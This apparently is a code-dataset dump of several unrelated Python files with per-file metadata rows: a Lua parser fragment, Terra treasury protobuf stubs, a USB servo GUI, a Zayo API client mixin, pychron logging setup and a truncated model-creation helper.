self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
exp_list = self.parse_exp_list()
return ast.AssignStat(var_list, exp_list)
"""
stat ::= ‘;’ |
break |
::Name:: |
goto Name |
do block end |
while exp do block end |
repeat block until exp |
if exp then block {elseif exp then block} [else block] end |
for Name ‘=’ exp ‘,’ exp [‘,’ exp] do block end |
for namelist in explist do block end |
function funcname funcbody |
local function Name funcbody |
local namelist [‘=’ explist]
varlist ‘=’ explist |
functioncall
"""
def parse_stat(self):
token = self.lex.look_ahead()
if token.kind == lexer.TokenKind.SEP_SEMI:
return self.parse_empty_stat()
elif token.kind == lexer.TokenKind.KW_BREAK:
return self.parse_break_stat()
elif token.kind == lexer.TokenKind.SEP_LABEL:
return self.parse_label_stat()
elif token.kind == lexer.TokenKind.KW_GOTO:
return self.parse_goto_stat()
elif token.kind == lexer.TokenKind.KW_DO:
return self.parse_do_stat()
elif token.kind == lexer.TokenKind.KW_WHILE:
return self.parse_while_stat()
elif token.kind == lexer.TokenKind.KW_REPEAT:
return self.parse_repeat_stat()
elif token.kind == lexer.TokenKind.KW_IF:
return self.parse_if_stat()
elif token.kind == lexer.TokenKind.KW_FOR:
return self.parse_for_stat()
elif token.kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_func_def_stat()
elif token.kind == lexer.TokenKind.KW_LOCAL:
return self.parse_local_def_stat()
else:
return self.parse_assign_or_func_call_stat()
def parse_empty_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_SEMI)
def parse_break_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_BREAK)
return ast.BreakStat()
def parse_label_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
return ast.LabelStat(label)
def parse_stats(self):
stats = []
while not self.is_block_end(self.lex.look_ahead().kind):
stat = self.parse_stat()
if stat:
stats.append(stat)
return stats
def is_block_end(self, kind):
if kind in self.block_end_tokens:
return True
return False | 42.894027 | 128 | 0.620519 | 22,448 | 0.998843 | 0 | 0 | 0 | 0 | 0 | 0 | 2,670 | 0.118804 |
73127b6e66f9e5e908a0672dbaeb988571d8cf2c | 14,720 | py | Python | python/terra_proto/terra/treasury/v1beta1/__init__.py | Vritra4/terra.proto | 977264b7c3e0f9d135120d77b48657b82f5eacf6 | [
"Apache-2.0"
]
| null | null | null | python/terra_proto/terra/treasury/v1beta1/__init__.py | Vritra4/terra.proto | 977264b7c3e0f9d135120d77b48657b82f5eacf6 | [
"Apache-2.0"
]
| null | null | null | python/terra_proto/terra/treasury/v1beta1/__init__.py | Vritra4/terra.proto | 977264b7c3e0f9d135120d77b48657b82f5eacf6 | [
"Apache-2.0"
]
| null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: terra/treasury/v1beta1/genesis.proto, terra/treasury/v1beta1/query.proto, terra/treasury/v1beta1/treasury.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import Dict, List
import betterproto
from betterproto.grpc.grpclib_server import ServiceBase
import grpclib
@dataclass(eq=False, repr=False)
class Params(betterproto.Message):
"""Params defines the parameters for the oracle module."""
tax_policy: "PolicyConstraints" = betterproto.message_field(1)
reward_policy: "PolicyConstraints" = betterproto.message_field(2)
seigniorage_burden_target: str = betterproto.string_field(3)
mining_increment: str = betterproto.string_field(4)
window_short: int = betterproto.uint64_field(5)
window_long: int = betterproto.uint64_field(6)
window_probation: int = betterproto.uint64_field(7)
@dataclass(eq=False, repr=False)
class PolicyConstraints(betterproto.Message):
"""
PolicyConstraints - defines policy constraints can be applied in tax &
reward policies
"""
rate_min: str = betterproto.string_field(1)
rate_max: str = betterproto.string_field(2)
cap: "___cosmos_base_v1_beta1__.Coin" = betterproto.message_field(3)
change_rate_max: str = betterproto.string_field(4)
@dataclass(eq=False, repr=False)
class EpochTaxProceeds(betterproto.Message):
"""
EpochTaxProceeds represents the tax amount collected at the current epoch
"""
tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class EpochInitialIssuance(betterproto.Message):
"""
EpochInitialIssuance represents initial issuance of the currrent epoch
"""
issuance: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxRateRequest(betterproto.Message):
"""
QueryTaxRateRequest is the request type for the Query/TaxRate RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryTaxRateResponse(betterproto.Message):
"""
QueryTaxRateResponse is response type for the Query/TaxRate RPC method.
"""
tax_rate: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxCapRequest(betterproto.Message):
"""
QueryTaxCapRequest is the request type for the Query/TaxCap RPC method.
"""
# denom defines the denomination to query for.
denom: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxCapResponse(betterproto.Message):
"""
QueryTaxCapResponse is response type for the Query/TaxCap RPC method.
"""
tax_cap: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxCapsRequest(betterproto.Message):
"""
QueryTaxCapsRequest is the request type for the Query/TaxCaps RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryTaxCapsResponseItem(betterproto.Message):
"""
QueryTaxCapsResponseItem is response item type for the Query/TaxCaps RPC
method.
"""
denom: str = betterproto.string_field(1)
tax_cap: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class QueryTaxCapsResponse(betterproto.Message):
"""
QueryTaxCapsResponse is response type for the Query/TaxCaps RPC method.
"""
tax_caps: List["QueryTaxCapsResponseItem"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class QueryRewardWeightRequest(betterproto.Message):
"""
QueryRewardWeightRequest is the request type for the Query/RewardWeight RPC
method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryRewardWeightResponse(betterproto.Message):
"""
QueryRewardWeightResponse is response type for the Query/RewardWeight RPC
method.
"""
reward_weight: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryTaxProceedsRequest(betterproto.Message):
"""
QueryTaxProceedsRequest is the request type for the Query/TaxProceeds RPC
method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryTaxProceedsResponse(betterproto.Message):
"""
QueryTaxProceedsResponse is response type for the Query/TaxProceeds RPC
method.
"""
tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class QuerySeigniorageProceedsRequest(betterproto.Message):
"""
QuerySeigniorageProceedsRequest is the request type for the
Query/SeigniorageProceeds RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QuerySeigniorageProceedsResponse(betterproto.Message):
"""
QuerySeigniorageProceedsResponse is response type for the
Query/SeigniorageProceeds RPC method.
"""
seigniorage_proceeds: str = betterproto.string_field(1)
@dataclass(eq=False, repr=False)
class QueryIndicatorsRequest(betterproto.Message):
"""
QueryIndicatorsRequest is the request type for the Query/Indicators RPC
method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryIndicatorsResponse(betterproto.Message):
"""
QueryIndicatorsResponse is response type for the Query/Indicators RPC
method.
"""
trl_year: str = betterproto.string_field(1)
trl_month: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class QueryParamsRequest(betterproto.Message):
"""
QueryParamsRequest is the request type for the Query/Params RPC method.
"""
pass
@dataclass(eq=False, repr=False)
class QueryParamsResponse(betterproto.Message):
"""
QueryParamsResponse is the response type for the Query/Params RPC method.
"""
# params defines the parameters of the module.
params: "Params" = betterproto.message_field(1)
@dataclass(eq=False, repr=False)
class GenesisState(betterproto.Message):
"""GenesisState defines the oracle module's genesis state."""
params: "Params" = betterproto.message_field(1)
tax_rate: str = betterproto.string_field(2)
reward_weight: str = betterproto.string_field(3)
tax_caps: List["TaxCap"] = betterproto.message_field(4)
tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(5)
epoch_initial_issuance: List[
"___cosmos_base_v1_beta1__.Coin"
] = betterproto.message_field(6)
epoch_states: List["EpochState"] = betterproto.message_field(7)
@dataclass(eq=False, repr=False)
class TaxCap(betterproto.Message):
"""TaxCap is the max tax amount can be charged for the given denom"""
denom: str = betterproto.string_field(1)
tax_cap: str = betterproto.string_field(2)
@dataclass(eq=False, repr=False)
class EpochState(betterproto.Message):
"""EpochState is the record for each epoch state"""
epoch: int = betterproto.uint64_field(1)
tax_reward: str = betterproto.string_field(2)
seigniorage_reward: str = betterproto.string_field(3)
total_staked_luna: str = betterproto.string_field(4)
class QueryStub(betterproto.ServiceStub):
async def tax_rate(self) -> "QueryTaxRateResponse":
request = QueryTaxRateRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxRate", request, QueryTaxRateResponse
)
async def tax_cap(self, *, denom: str = "") -> "QueryTaxCapResponse":
request = QueryTaxCapRequest()
request.denom = denom
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxCap", request, QueryTaxCapResponse
)
async def tax_caps(self) -> "QueryTaxCapsResponse":
request = QueryTaxCapsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxCaps", request, QueryTaxCapsResponse
)
async def reward_weight(self) -> "QueryRewardWeightResponse":
request = QueryRewardWeightRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/RewardWeight",
request,
QueryRewardWeightResponse,
)
async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse":
request = QuerySeigniorageProceedsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/SeigniorageProceeds",
request,
QuerySeigniorageProceedsResponse,
)
async def tax_proceeds(self) -> "QueryTaxProceedsResponse":
request = QueryTaxProceedsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/TaxProceeds",
request,
QueryTaxProceedsResponse,
)
async def indicators(self) -> "QueryIndicatorsResponse":
request = QueryIndicatorsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/Indicators", request, QueryIndicatorsResponse
)
async def params(self) -> "QueryParamsResponse":
request = QueryParamsRequest()
return await self._unary_unary(
"/terra.treasury.v1beta1.Query/Params", request, QueryParamsResponse
)
class QueryBase(ServiceBase):
async def tax_rate(self) -> "QueryTaxRateResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def tax_cap(self, denom: str) -> "QueryTaxCapResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def tax_caps(self) -> "QueryTaxCapsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def reward_weight(self) -> "QueryRewardWeightResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def tax_proceeds(self) -> "QueryTaxProceedsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def indicators(self) -> "QueryIndicatorsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def params(self) -> "QueryParamsResponse":
raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED)
async def __rpc_tax_rate(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.tax_rate(**request_kwargs)
await stream.send_message(response)
async def __rpc_tax_cap(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {
"denom": request.denom,
}
response = await self.tax_cap(**request_kwargs)
await stream.send_message(response)
async def __rpc_tax_caps(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.tax_caps(**request_kwargs)
await stream.send_message(response)
async def __rpc_reward_weight(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.reward_weight(**request_kwargs)
await stream.send_message(response)
async def __rpc_seigniorage_proceeds(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.seigniorage_proceeds(**request_kwargs)
await stream.send_message(response)
async def __rpc_tax_proceeds(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.tax_proceeds(**request_kwargs)
await stream.send_message(response)
async def __rpc_indicators(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.indicators(**request_kwargs)
await stream.send_message(response)
async def __rpc_params(self, stream: grpclib.server.Stream) -> None:
request = await stream.recv_message()
request_kwargs = {}
response = await self.params(**request_kwargs)
await stream.send_message(response)
def __mapping__(self) -> Dict[str, grpclib.const.Handler]:
return {
"/terra.treasury.v1beta1.Query/TaxRate": grpclib.const.Handler(
self.__rpc_tax_rate,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxRateRequest,
QueryTaxRateResponse,
),
"/terra.treasury.v1beta1.Query/TaxCap": grpclib.const.Handler(
self.__rpc_tax_cap,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxCapRequest,
QueryTaxCapResponse,
),
"/terra.treasury.v1beta1.Query/TaxCaps": grpclib.const.Handler(
self.__rpc_tax_caps,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxCapsRequest,
QueryTaxCapsResponse,
),
"/terra.treasury.v1beta1.Query/RewardWeight": grpclib.const.Handler(
self.__rpc_reward_weight,
grpclib.const.Cardinality.UNARY_UNARY,
QueryRewardWeightRequest,
QueryRewardWeightResponse,
),
"/terra.treasury.v1beta1.Query/SeigniorageProceeds": grpclib.const.Handler(
self.__rpc_seigniorage_proceeds,
grpclib.const.Cardinality.UNARY_UNARY,
QuerySeigniorageProceedsRequest,
QuerySeigniorageProceedsResponse,
),
"/terra.treasury.v1beta1.Query/TaxProceeds": grpclib.const.Handler(
self.__rpc_tax_proceeds,
grpclib.const.Cardinality.UNARY_UNARY,
QueryTaxProceedsRequest,
QueryTaxProceedsResponse,
),
"/terra.treasury.v1beta1.Query/Indicators": grpclib.const.Handler(
self.__rpc_indicators,
grpclib.const.Cardinality.UNARY_UNARY,
QueryIndicatorsRequest,
QueryIndicatorsResponse,
),
"/terra.treasury.v1beta1.Query/Params": grpclib.const.Handler(
self.__rpc_params,
grpclib.const.Cardinality.UNARY_UNARY,
QueryParamsRequest,
QueryParamsResponse,
),
}
from ....cosmos.base import v1beta1 as ___cosmos_base_v1_beta1__
| 31.120507 | 122 | 0.691508 | 13,417 | 0.911481 | 0 | 0 | 6,648 | 0.45163 | 5,108 | 0.347011 | 3,817 | 0.259307 |
7316876aa79ec9dd6b9b2ee309c9f7ea22776613 | 5,066 | py | Python | usbservo/usbservogui.py | ppfenninger/screwball | c4a7273fa47dac6bdf6fcf8ca29c85a77f9e5bd6 | [
"MIT"
]
| null | null | null | usbservo/usbservogui.py | ppfenninger/screwball | c4a7273fa47dac6bdf6fcf8ca29c85a77f9e5bd6 | [
"MIT"
]
| null | null | null | usbservo/usbservogui.py | ppfenninger/screwball | c4a7273fa47dac6bdf6fcf8ca29c85a77f9e5bd6 | [
"MIT"
]
| null | null | null | #
## Copyright (c) 2018, Bradley A. Minch
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## 1. Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## 2. Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
## ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
## LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
## CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
## SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
## INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
## CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
## ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
## POSSIBILITY OF SUCH DAMAGE.
#
import Tkinter as tk
import usbservo
class usbservogui:
def __init__(self):
self.dev = usbservo.usbservo()
if self.dev.dev >= 0:
self.update_job = None
self.root = tk.Tk()
self.root.title('USB Servo GUI')
self.root.protocol('WM_DELETE_WINDOW', self.shut_down)
fm = tk.Frame(self.root)
tk.Button(fm, text = 'LED1', command = self.dev.toggle_led1).pack(side = tk.LEFT)
tk.Button(fm, text = 'LED2', command = self.dev.toggle_led2).pack(side = tk.LEFT)
tk.Button(fm, text = 'LED3', command = self.dev.toggle_led3).pack(side = tk.LEFT)
fm.pack(side = tk.TOP)
servo1_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo1_callback)
servo1_slider.set(32768)
servo1_slider.pack(side = tk.TOP)
servo2_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo2_callback)
servo2_slider.set(32768)
servo2_slider.pack(side = tk.TOP)
servo3_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo3_callback)
servo3_slider.set(32768)
servo3_slider.pack(side = tk.TOP)
servo4_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo4_callback)
servo4_slider.set(32768)
servo4_slider.pack(side = tk.TOP)
servo5_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo5_callback)
servo5_slider.set(32768)
servo5_slider.pack(side = tk.TOP)
self.sw1_status = tk.Label(self.root, text = 'SW1 is currently ?')
self.sw1_status.pack(side = tk.TOP)
self.sw2_status = tk.Label(self.root, text = 'SW2 is currently ?')
self.sw2_status.pack(side = tk.TOP)
self.sw3_status = tk.Label(self.root, text = 'SW3 is currently ?')
self.sw3_status.pack(side = tk.TOP)
self.a0_status = tk.Label(self.root, text = 'A0 is currently ????')
self.a0_status.pack(side = tk.TOP)
self.update_status()
def set_servo1_callback(self, value):
self.dev.set_servo1(int(value))
def set_servo2_callback(self, value):
self.dev.set_servo2(int(value))
def set_servo3_callback(self, value):
self.dev.set_servo3(int(value))
def set_servo4_callback(self, value):
self.dev.set_servo4(int(value))
def set_servo5_callback(self, value):
self.dev.set_servo5(int(value))
def update_status(self):
curr_a0 = self.dev.read_a0()
self.sw1_status.configure(text = 'SW1 is currently {!s}'.format(self.dev.read_sw1()))
self.sw2_status.configure(text = 'SW2 is currently {!s}'.format(self.dev.read_sw2()))
self.sw3_status.configure(text = 'SW3 is currently {!s}'.format(self.dev.read_sw3()))
if curr_a0 is not None:
self.a0_status.configure(text = 'A0 is currently {:04d}'.format(curr_a0))
self.update_job = self.root.after(50, self.update_status)
def shut_down(self):
self.root.after_cancel(self.update_job)
self.root.destroy()
self.dev.close()
if __name__=='__main__':
gui = usbservogui()
gui.root.mainloop()
| 49.666667 | 153 | 0.647059 | 3,507 | 0.692262 | 0 | 0 | 0 | 0 | 0 | 0 | 1,645 | 0.324714 |
7317deb1560647aa925ec2a580d6d0908f2796af | 155 | py | Python | GasBotty/models/utils.py | GreenCUBIC/GasBotty | 158f5991201c80bf4cbbbb9deabc9954ff19bbb1 | [
"MIT"
]
| 353 | 2020-12-10T10:47:17.000Z | 2022-03-31T23:08:29.000Z | GasBotty/models/utils.py | GreenCUBIC/GasBotty | 158f5991201c80bf4cbbbb9deabc9954ff19bbb1 | [
"MIT"
]
| 80 | 2020-12-10T09:54:22.000Z | 2022-03-30T22:08:45.000Z | GasBotty/models/utils.py | GreenCUBIC/GasBotty | 158f5991201c80bf4cbbbb9deabc9954ff19bbb1 | [
"MIT"
]
| 63 | 2020-12-10T17:10:34.000Z | 2022-03-28T16:27:07.000Z | try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
| 31 | 75 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7318340689a601475670cd96bc3a15da21a3e8a4 | 2,438 | py | Python | pyzayo/svcinv_mixin.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
]
| 1 | 2021-06-02T10:00:35.000Z | 2021-06-02T10:00:35.000Z | pyzayo/svcinv_mixin.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
]
| null | null | null | pyzayo/svcinv_mixin.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
]
| null | null | null | """
This file contains the Zayo Service Inventory related API endpoints.
References
----------
Docs
http://54.149.224.75/wp-content/uploads/2020/02/Service-Inventory-Wiki.pdf
"""
# -----------------------------------------------------------------------------
# System Imports
# -----------------------------------------------------------------------------
from typing import List, Dict
# -----------------------------------------------------------------------------
# Public Imports
# -----------------------------------------------------------------------------
from first import first
# -----------------------------------------------------------------------------
# Private Imports
# -----------------------------------------------------------------------------
from pyzayo.base_client import ZayoClientBase
from pyzayo.consts import ZAYO_SM_ROUTE_SERVICES
# -----------------------------------------------------------------------------
# Module Exports
# -----------------------------------------------------------------------------
__all__ = ["ZayoServiceInventoryMixin"]
class ZayoServiceInventoryMixin(ZayoClientBase):
""" Supports the Service-Inventory API endpoints """
def get_services(self, **params) -> List[Dict]:
"""
Retrieve the service-inventory records given the `params` criterial
or all.
Other Parameters
----------------
key-value options as defined by the "existing-services" API endpoint.
The `filter` parameter, for example, supports the following
API record fields:
* status
* productGroup
* productCatagory
* product
* term
"""
return self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params)
def get_service_by_circuit_id(self, by_circuit_id: str, **params):
"""
Locate the service associated with the given ciruid ID.
Parameters
----------
by_circuit_id: str
The circuit ID string value
Other Parameters
----------------
Same as get_services() method, see for details.
Returns
-------
The service record in dict form from API.
"""
return first(
rec
for rec in self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params)
if rec["components"][0]["circuitId"] == by_circuit_id
)
| 30.475 | 82 | 0.455291 | 1,341 | 0.550041 | 0 | 0 | 0 | 0 | 0 | 0 | 1,807 | 0.741181 |
7318d12083b715d2887f9b7cf5b2559fad4d08c0 | 6,236 | py | Python | pychron/core/helpers/logger_setup.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
]
| 1 | 2019-02-27T21:57:44.000Z | 2019-02-27T21:57:44.000Z | pychron/core/helpers/logger_setup.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
]
| 20 | 2020-09-09T20:58:39.000Z | 2021-10-05T17:48:37.000Z | pychron/core/helpers/logger_setup.py | AGESLDEO/pychron | 1a81e05d9fba43b797f335ceff6837c016633bcf | [
"Apache-2.0"
]
| null | null | null | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
# =============standard library imports ========================
from __future__ import absolute_import
import logging
import os
import shutil
from logging.handlers import RotatingFileHandler
from pychron.core.helpers.filetools import list_directory, unique_path2
from pychron.paths import paths
NAME_WIDTH = 40
gFORMAT = '%(name)-{}s: %(asctime)s %(levelname)-9s (%(threadName)-10s) %(message)s'.format(NAME_WIDTH)
gLEVEL = logging.DEBUG
def simple_logger(name):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
h = logging.StreamHandler()
h.setFormatter(logging.Formatter(gFORMAT))
logger.addHandler(h)
return logger
def get_log_text(n):
root = logging.getLogger()
for h in root.handlers:
if isinstance(h, RotatingFileHandler):
with open(h.baseFilename, 'rb') as rfile:
return tail(rfile, n)
def tail(f, lines=20):
"""
http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail
"""
total_lines_wanted = lines
BLOCK_SIZE = 1024
f.seek(0, 2)
block_end_byte = f.tell()
lines_to_go = total_lines_wanted
block_number = -1
blocks = [] # blocks of size BLOCK_SIZE, in reverse order starting
# from the end of the file
while lines_to_go > 0 and block_end_byte > 0:
if block_end_byte - BLOCK_SIZE > 0:
# read the last block we haven't yet read
f.seek(block_number * BLOCK_SIZE, 2)
blocks.append(f.read(BLOCK_SIZE))
else:
# file too small, start from begining
f.seek(0, 0)
# only read what was not read
blocks.append(f.read(block_end_byte))
lines_found = blocks[-1].count(b'\n')
lines_to_go -= lines_found
block_end_byte -= BLOCK_SIZE
block_number -= 1
all_read_text = b''.join(reversed(blocks))
return b'\n'.join(all_read_text.splitlines()[-total_lines_wanted:]).decode('utf-8')
# def anomaly_setup(name):
# ld = logging.Logger.manager.loggerDict
# print 'anomaly setup ld={}'.format(ld)
# if name not in ld:
# bdir = paths.log_dir
# name = add_extension(name, '.anomaly')
# apath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log')
# logger = logging.getLogger('anomalizer')
# h = logging.FileHandler(apath)
# logger.addHandler(h)
def logging_setup(name, use_archiver=True, root=None, use_file=True, **kw):
"""
"""
# set up deprecation warnings
# import warnings
# warnings.simplefilter('default')
bdir = paths.log_dir if root is None else root
# make sure we have a log directory
# if not os.path.isdir(bdir):
# os.mkdir(bdir)
if use_archiver:
# archive logs older than 1 month
# lazy load Archive because of circular dependency
from pychron.core.helpers.archiver import Archiver
a = Archiver(archive_days=14,
archive_months=1,
root=bdir)
a.clean()
if use_file:
# create a new logging file
logname = '{}.current.log'.format(name)
logpath = os.path.join(bdir, logname)
if os.path.isfile(logpath):
backup_logpath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log', width=5)
shutil.copyfile(logpath, backup_logpath)
os.remove(logpath)
ps = list_directory(bdir, filtername=logname, remove_extension=False)
for pi in ps:
_h, t = os.path.splitext(pi)
v = os.path.join(bdir, pi)
shutil.copyfile(v, '{}{}'.format(backup_logpath, t))
os.remove(v)
root = logging.getLogger()
root.setLevel(gLEVEL)
shandler = logging.StreamHandler()
handlers = [shandler]
if use_file:
rhandler = RotatingFileHandler(
logpath, maxBytes=1e7, backupCount=50)
handlers.append(rhandler)
fmt = logging.Formatter(gFORMAT)
for hi in handlers:
hi.setLevel(gLEVEL)
hi.setFormatter(fmt)
root.addHandler(hi)
def add_root_handler(path, level=None, strformat=None, **kw):
if level is None:
level = gLEVEL
if format is None:
strformat = gFORMAT
root = logging.getLogger()
handler = logging.FileHandler(path, **kw)
handler.setLevel(level)
handler.setFormatter(logging.Formatter(strformat))
root.addHandler(handler)
return handler
def remove_root_handler(handler):
root = logging.getLogger()
root.removeHandler(handler)
def new_logger(name):
name = '{:<{}}'.format(name, NAME_WIDTH)
l = logging.getLogger(name)
l.setLevel(gLEVEL)
return l
def wrap(items, width=40, indent=90, delimiter=','):
"""
wrap a list
"""
if isinstance(items, str):
items = items.split(delimiter)
gcols = iter(items)
t = 0
rs = []
r = []
while 1:
try:
c = next(gcols)
t += 1 + len(c)
if t < width:
r.append(c)
else:
rs.append(','.join(r))
r = [c]
t = len(c)
except StopIteration:
rs.append(','.join(r))
break
return ',\n{}'.format(' ' * indent).join(rs)
# ============================== EOF ===================================
| 29.837321 | 103 | 0.591725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,109 | 0.338198 |
7318f31264c2155178f9f5bd08d307cfd0e1de20 | 7,980 | py | Python | picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
]
| null | null | null | picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
]
| null | null | null | picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
]
| null | null | null | import picmodels
def create_row_w_validated_params(cls, validated_params, rqst_errors):
if 'name' not in validated_params:
rqst_errors.append("'name' is a required key in the validated_params argument")
return None
if cls.check_for_rows_with_given_name(validated_params['name'], rqst_errors):
return None
row = cls()
row.name = validated_params['name']
row.save()
if 'add_steps' in validated_params:
steps_info = validated_params['add_steps']
cmstepsforsequences_rows = []
for step_id in steps_info:
cmstepsforsequences_rows.append(
get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors)
)
if not rqst_errors:
check_steps_for_given_rows_or_matching_step_number(
row.steps.all(),
cmstepsforsequences_rows,
row,
rqst_errors
)
if not rqst_errors:
cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number)
for step_row in cmstepsforsequences_rows:
